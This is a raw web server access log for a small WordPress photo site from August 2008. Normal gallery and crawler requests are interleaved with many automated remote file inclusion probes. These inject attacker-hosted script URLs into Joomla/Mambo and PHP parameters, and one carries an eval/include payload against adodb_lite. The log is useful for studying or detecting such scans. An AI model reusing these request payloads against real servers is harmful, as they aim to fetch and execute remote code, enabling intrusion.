67.15.58.12 - - [18/Aug/2008:13:17:28 -0700] "GET /logs/access_080624.log/?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.gantoo.com/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
70.38.12.204 - - [18/Aug/2008:13:17:31 -0700] "GET /logs/access_080309.log//?option=com_custompages&cpage=http://www.gantoo.com/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.38.12.204 - - [18/Aug/2008:13:17:31 -0700] "GET /logs/access_080309.log//?option=com_custompages&cpage=http://www.gantoo.com/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.52.66.242 - - [18/Aug/2008:13:17:34 -0700] "GET /logs/access_080309.log//?option=com_custompages&cpage=http://www.gantoo.com/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
63.206.47.131 - - [18/Aug/2008:13:17:34 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0020.jpg HTTP/1.1" 200 361318 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
63.206.47.131 - - [18/Aug/2008:13:17:45 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-161_0.jpg HTTP/1.1" 200 480278 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
63.206.47.131 - - [18/Aug/2008:13:17:56 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-007_2.jpg HTTP/1.1" 200 350863 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
63.206.47.131 - - [18/Aug/2008:13:18:06 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-149_0.jpg HTTP/1.1" 200 248840 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
63.206.47.131 - - [18/Aug/2008:13:18:16 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-155_0.jpg HTTP/1.1" 200 162359 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
63.206.47.131 - - [18/Aug/2008:13:18:27 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-181_0.jpg HTTP/1.1" 200 316719 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
63.206.47.131 - - [18/Aug/2008:13:18:38 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-035_2.jpg HTTP/1.1" 200 337137 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
63.206.47.131 - - [18/Aug/2008:13:18:49 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-168.jpg HTTP/1.1" 200 421778 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
63.206.47.131 - - [18/Aug/2008:13:19:01 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-044_3.jpg HTTP/1.1" 200 399964 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
63.206.47.131 - - [18/Aug/2008:13:19:12 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-042_1.jpg HTTP/1.1" 200 384936 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
63.206.47.131 - - [18/Aug/2008:13:19:24 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-096_0.jpg HTTP/1.1" 200 323897 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
61.100.30.4 - - [18/Aug/2008:13:19:27 -0700] "GET /logs/access_080724.log//index.php?DOCUMENT_ROOT=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
63.206.47.131 - - [18/Aug/2008:13:19:36 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-084_0.jpg HTTP/1.1" 200 404736 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
63.206.47.131 - - [18/Aug/2008:13:19:47 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-047_1.jpg HTTP/1.1" 200 386939 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
63.206.47.131 - - [18/Aug/2008:13:19:59 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-027_1.jpg HTTP/1.1" 200 464058 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
63.206.47.131 - - [18/Aug/2008:13:20:11 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-001_3.jpg HTTP/1.1" 200 446055 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
74.6.22.125 - - [18/Aug/2008:13:20:15 -0700] "GET /logs/access_080805.log HTTP/1.0" 200 196608 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
63.206.47.131 - - [18/Aug/2008:13:20:23 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-031_3.jpg HTTP/1.1" 200 520511 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
212.117.89.191 - - [18/Aug/2008:13:20:24 -0700] "GET /logs/access_080713.log/index.php?fn=http://www.freexhost.info/users/gardhenal/Id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
63.206.47.131 - - [18/Aug/2008:13:20:35 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-035_0.jpg HTTP/1.1" 200 276707 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
63.206.47.131 - - [18/Aug/2008:13:20:47 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-087_1.jpg HTTP/1.1" 200 408915 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
63.206.47.131 - - [18/Aug/2008:13:20:58 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-003_0.jpg HTTP/1.1" 200 362527 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
81.169.165.173 - - [18/Aug/2008:13:21:09 -0700] "GET /logs/access_080717.log/?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.gantoo.com/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.169.165.173 - - [18/Aug/2008:13:21:09 -0700] "GET /logs/access_080717.log/?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.gantoo.com/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.169.165.173 - - [18/Aug/2008:13:21:10 -0700] "GET /?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.gantoo.com/images/prc.gif? HTTP/1.1" 200 9923 "-" "libwww-perl/5.805" "www.dmulk.com"
81.169.165.173 - - [18/Aug/2008:13:21:10 -0700] "GET /?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.gantoo.com/images/prc.gif? HTTP/1.1" 200 9923 "-" "libwww-perl/5.805" "www.dmulk.com"
81.169.165.173 - - [18/Aug/2008:13:21:11 -0700] "GET /logs/?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.gantoo.com/images/prc.gif? HTTP/1.1" 200 61141 "-" "libwww-perl/5.805" "www.dmulk.com"
81.169.165.173 - - [18/Aug/2008:13:21:11 -0700] "GET /logs/?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.gantoo.com/images/prc.gif? HTTP/1.1" 200 61141 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.81.18 - - [18/Aug/2008:13:21:14 -0700] "GET /logs/access_080315.log/index.php?fn=http://www.freexhost.info/users/gardhenal/Id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.231.138.99 - - [18/Aug/2008:13:21:48 -0700] "GET /logs/access_080725.log/errors.php?error=http://socomalliance.com/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.231.138.99 - - [18/Aug/2008:13:21:49 -0700] "GET /errors.php?error=http://socomalliance.com/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.231.138.99 - - [18/Aug/2008:13:21:49 -0700] "GET /logs/errors.php?error=http://socomalliance.com/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.231.138.99 - - [18/Aug/2008:13:22:15 -0700] "GET /logs/access_080724.log/errors.php?error=http://socomalliance.com/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
78.80.18.136 - - [18/Aug/2008:13:22:16 -0700] "GET /claroline/phpbb/page_tail.php?includePath=http://www.freexhost.info/users/gardhenal/Id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "dmulk.com"
67.15.58.12 - - [18/Aug/2008:13:22:22 -0700] "GET /logs/access_080215.log//?option=com_custompages&cpage=http://www.gantoo.com/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.58.12 - - [18/Aug/2008:13:22:22 -0700] "GET /logs/access_080215.log//?option=com_custompages&cpage=http://www.gantoo.com/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.58.12 - - [18/Aug/2008:13:22:24 -0700] "GET //?option=com_custompages&cpage=http://www.gantoo.com/images/prc.gif? HTTP/1.1" 200 9897 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.58.12 - - [18/Aug/2008:13:22:24 -0700] "GET //?option=com_custompages&cpage=http://www.gantoo.com/images/prc.gif? HTTP/1.1" 200 9897 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.58.12 - - [18/Aug/2008:13:22:24 -0700] "GET /logs//?option=com_custompages&cpage=http://www.gantoo.com/images/prc.gif? HTTP/1.1" 200 61146 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.58.12 - - [18/Aug/2008:13:22:25 -0700] "GET /logs//?option=com_custompages&cpage=http://www.gantoo.com/images/prc.gif? HTTP/1.1" 200 61146 "-" "libwww-perl/5.65" "www.dmulk.com"
208.115.34.17 - - [18/Aug/2008:13:23:19 -0700] "GET /?sourcedir=http://www.ghareng.com/alat/echo.txt?? HTTP/1.1" 200 9876 "-" "libwww-perl/5.813" "www.dmulk.com"
208.115.34.17 - - [18/Aug/2008:13:23:20 -0700] "GET /?sourcedir=http://www.myboso.com/load.txt? HTTP/1.1" 200 9865 "-" "libwww-perl/5.813" "www.dmulk.com"
58.227.193.215 - - [18/Aug/2008:13:23:29 -0700] "GET /logs/access_080606.log//?_SERVER[DOCUMENT_ROOT]=http://www.gantoo.com/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
58.227.193.215 - - [18/Aug/2008:13:23:30 -0700] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.gantoo.com/images/prc.gif? HTTP/1.1" 200 9890 "-" "libwww-perl/5.79" "www.dmulk.com"
58.227.193.215 - - [18/Aug/2008:13:23:31 -0700] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.gantoo.com/images/prc.gif? HTTP/1.1" 200 61146 "-" "libwww-perl/5.79" "www.dmulk.com"
58.227.193.215 - - [18/Aug/2008:13:23:31 -0700] "GET /logs/access_080615.log//?_SERVER[DOCUMENT_ROOT]=http://www.gantoo.com/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.231.138.99 - - [18/Aug/2008:13:23:46 -0700] "GET /logs/access_080806.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://socomalliance.com/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.231.138.99 - - [18/Aug/2008:13:23:46 -0700] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://socomalliance.com/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.231.138.99 - - [18/Aug/2008:13:23:46 -0700] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://socomalliance.com/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.10.5.213 - - [18/Aug/2008:13:24:00 -0700] "GET / HTTP/1.1" 200 9809 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
74.10.5.213 - - [18/Aug/2008:13:24:01 -0700] "GET /blog/wp-content/themes/default/style.css HTTP/1.1" 200 9232 "http://dmulk.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
74.10.5.213 - - [18/Aug/2008:13:24:01 -0700] "GET /blog/wp-content/plugins/nggallery/css/nggallery.css HTTP/1.1" 200 5241 "http://dmulk.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
74.10.5.213 - - [18/Aug/2008:13:24:01 -0700] "GET /blog/wp-content/plugins/nggallery/thickbox/thickbox.css HTTP/1.1" 200 4019 "http://dmulk.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
74.10.5.213 - - [18/Aug/2008:13:24:01 -0700] "GET /blog/wp-includes/js/jquery/jquery.js?ver=1.2.3 HTTP/1.1" 200 29867 "http://dmulk.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
74.10.5.213 - - [18/Aug/2008:13:24:01 -0700] "GET /blog/wp-content/plugins/nggallery/thickbox/thickbox-pack.js?ver=3.1.1 HTTP/1.1" 200 8888 "http://dmulk.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
74.10.5.213 - - [18/Aug/2008:13:24:02 -0700] "GET /blog/wp-content/plugins/nggallery/admin/js/swfobject.js?ver=1.5 HTTP/1.1" 200 6722 "http://dmulk.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
74.10.5.213 - - [18/Aug/2008:13:24:02 -0700] "GET /blog/wp-content/themes/default/images/kubrickbgwide.jpg HTTP/1.1" 200 1014 "http://dmulk.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
74.10.5.213 - - [18/Aug/2008:13:24:02 -0700] "GET /blog/wp-content/themes/default/images/kubrickbgcolor.jpg HTTP/1.1" 200 556 "http://dmulk.com/blog/wp-content/themes/default/style.css" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
74.10.5.213 - - [18/Aug/2008:13:24:02 -0700] "GET /blog/wp-content/plugins/nggallery/thickbox/loadingAnimationv3.gif HTTP/1.1" 200 5886 "http://dmulk.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
74.10.5.213 - - [18/Aug/2008:13:24:02 -0700] "GET /blog/wp-content/plugins/nggallery/imagerotator.swf HTTP/1.1" 200 42010 "http://dmulk.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
74.10.5.213 - - [18/Aug/2008:13:24:02 -0700] "GET /blog/wp-content/themes/default/images/kubrickheader.jpg HTTP/1.1" 200 7868 "http://dmulk.com/blog/wp-content/themes/default/style.css" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
74.10.5.213 - - [18/Aug/2008:13:24:02 -0700] "GET /blog/wp-content/themes/default/images/kubrickfooter.jpg HTTP/1.1" 200 2443 "http://dmulk.com/blog/wp-content/themes/default/style.css" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
83.231.138.99 - - [18/Aug/2008:13:24:04 -0700] "GET /logs/access_080730.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://socomalliance.com/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.231.138.99 - - [18/Aug/2008:13:24:11 -0700] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://socomalliance.com/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
220.85.13.67 - - [18/Aug/2008:13:24:12 -0700] "GET //?path%5Bdocroot%5D=http://socomalliance.com/sistem.gif? HTTP/1.1" 200 9878 "-" "libwww-perl/5.65" "www.dmulk.com"
74.10.5.213 - - [18/Aug/2008:13:24:16 -0700] "GET /blog/wp-content/plugins/nggallery/nggextractXML.php?gid=0&387 HTTP/1.1" 200 185990 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
67.15.58.12 - - [18/Aug/2008:13:24:22 -0700] "GET /logs/access_080209.log//?option=com_custompages&cpage=http://www.gantoo.com/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.10.5.213 - - [18/Aug/2008:13:24:23 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
74.10.5.213 - - [18/Aug/2008:13:24:23 -0700] "GET /blog/index.php/2008/08/ HTTP/1.1" 200 10077 "http://dmulk.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
74.10.5.213 - - [18/Aug/2008:13:24:24 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-131.jpg HTTP/1.1" 200 327680 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
74.10.5.213 - - [18/Aug/2008:13:24:24 -0700] "GET /blog/wp-content/plugins/nggallery/nggextractXML.php?gid=0&858 HTTP/1.1" 200 185990 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
201.80.26.155 - - [18/Aug/2008:13:24:27 -0700] "GET /logs/access_080720.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://adamari.net/img/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.10.5.213 - - [18/Aug/2008:13:24:36 -0700] "GET /blog/index.php/2008/06/ HTTP/1.1" 200 10159 "http://dmulk.com/blog/2008/08/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
74.10.5.213 - - [18/Aug/2008:13:24:37 -0700] "GET /blog/wp-content/plugins/nggallery/nggextractXML.php?gid=0&685 HTTP/1.1" 200 185990 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
74.10.5.213 - - [18/Aug/2008:13:24:37 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0064.jpg HTTP/1.1" 200 327680 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
213.246.46.202 - - [18/Aug/2008:13:25:00 -0700] "GET /logs/access_080404.log//?path%5Bdocroot%5D=http://www.lovasok.hu/admin/templates_c/idpula.txt? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
213.246.46.202 - - [18/Aug/2008:13:25:01 -0700] "GET /logs/access_080226.log//?path%5Bdocroot%5D=http://www.lovasok.hu/admin/templates_c/idpula.txt? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
70.38.12.204 - - [18/Aug/2008:13:25:42 -0700] "GET /logs/?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.gantoo.com/images/prc.gif? HTTP/1.1" 200 61141 "-" "libwww-perl/5.805" "www.dmulk.com"
70.38.12.204 - - [18/Aug/2008:13:25:43 -0700] "GET /?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.gantoo.com/images/prc.gif? HTTP/1.1" 200 9923 "-" "libwww-perl/5.805" "www.dmulk.com"
81.169.165.173 - - [18/Aug/2008:13:26:09 -0700] "GET /logs/access_080229.log/?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.gantoo.com/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.169.165.173 - - [18/Aug/2008:13:26:09 -0700] "GET /logs/access_080229.log/?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.gantoo.com/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.22.125 - - [18/Aug/2008:13:26:11 -0700] "GET /logs/access_080207.log HTTP/1.0" 200 196608 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
212.53.64.40 - - [18/Aug/2008:13:26:29 -0700] "GET /logs/access_080621.log/?sourcedir=http://www.ghareng.com/alat/echo.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.53.64.40 - - [18/Aug/2008:13:26:29 -0700] "GET /logs/access_080621.log/?sourcedir=http://www.ghareng.com/alat/echo.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
80.93.212.218 - - [18/Aug/2008:13:26:30 -0700] "GET /logs/access_080717.log/?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.gantoo.com/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.93.212.218 - - [18/Aug/2008:13:26:34 -0700] "GET /?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.gantoo.com/images/prc.gif? HTTP/1.1" 200 9923 "-" "libwww-perl/5.808" "www.dmulk.com"
80.93.212.218 - - [18/Aug/2008:13:26:39 -0700] "GET /logs/?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.gantoo.com/images/prc.gif? HTTP/1.1" 200 61141 "-" "libwww-perl/5.808" "www.dmulk.com"
212.53.64.40 - - [18/Aug/2008:13:26:49 -0700] "GET /logs/access_080621.log/?sourcedir=http://www.ghareng.com/alat/echo.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
200.101.192.223 - - [18/Aug/2008:13:26:53 -0700] "GET /logs/access_080312.log//faqsupport/samplefaqsupport.php?path[docroot]=http://alwayskl.iespana.es/alb.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
67.15.58.12 - - [18/Aug/2008:13:26:57 -0700] "GET /logs/access_080309.log//?option=com_custompages&cpage=http://www.gantoo.com/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.58.12 - - [18/Aug/2008:13:26:57 -0700] "GET /logs/access_080309.log//?option=com_custompages&cpage=http://www.gantoo.com/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
141.89.66.2 - - [18/Aug/2008:13:27:02 -0700] "GET /logs/access_080131.log//index.php?pagina=http://www.inf.ufes.br/~pet/topcom6/response.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
141.89.66.2 - - [18/Aug/2008:13:27:02 -0700] "GET /logs//index.php?pagina=http://www.inf.ufes.br/~pet/topcom6/response.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
141.89.66.2 - - [18/Aug/2008:13:27:03 -0700] "GET //index.php?pagina=http://www.inf.ufes.br/~pet/topcom6/response.txt???? HTTP/1.1" 200 9895 "-" "libwww-perl/5.805" "www.dmulk.com"
208.98.1.215 - - [18/Aug/2008:13:27:08 -0700] "GET /logs/access_080730.log/view.php?sub=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
208.98.1.215 - - [18/Aug/2008:13:27:08 -0700] "GET /view.php?sub=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
208.98.1.215 - - [18/Aug/2008:13:27:14 -0700] "GET /logs/access_080808.log/view.php?sub=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
208.98.1.215 - - [18/Aug/2008:13:27:16 -0700] "GET /logs/access_080730.log/view.php?sub=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
208.98.1.215 - - [18/Aug/2008:13:27:16 -0700] "GET /view.php?sub=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
208.98.1.215 - - [18/Aug/2008:13:27:17 -0700] "GET /logs/access_080510.log/view.php?sub=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
80.93.212.218 - - [18/Aug/2008:13:27:42 -0700] "GET /logs/access_080717.log/?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.gantoo.com/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.93.212.218 - - [18/Aug/2008:13:27:44 -0700] "GET /?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.gantoo.com/images/prc.gif? HTTP/1.1" 200 9923 "-" "libwww-perl/5.808" "www.dmulk.com"
212.53.64.40 - - [18/Aug/2008:13:27:46 -0700] "GET /logs/access_080621.log/?sourcedir=http://www.ghareng.com/alat/echo.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
80.93.212.218 - - [18/Aug/2008:13:27:46 -0700] "GET /logs/?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.gantoo.com/images/prc.gif? HTTP/1.1" 200 61141 "-" "libwww-perl/5.808" "www.dmulk.com"
212.53.64.40 - - [18/Aug/2008:13:27:53 -0700] "GET /logs/access_080621.log/?sourcedir=http://www.ghareng.com/alat/echo.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
83.231.138.99 - - [18/Aug/2008:13:28:16 -0700] "GET /errors.php?error=http://socomalliance.com/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
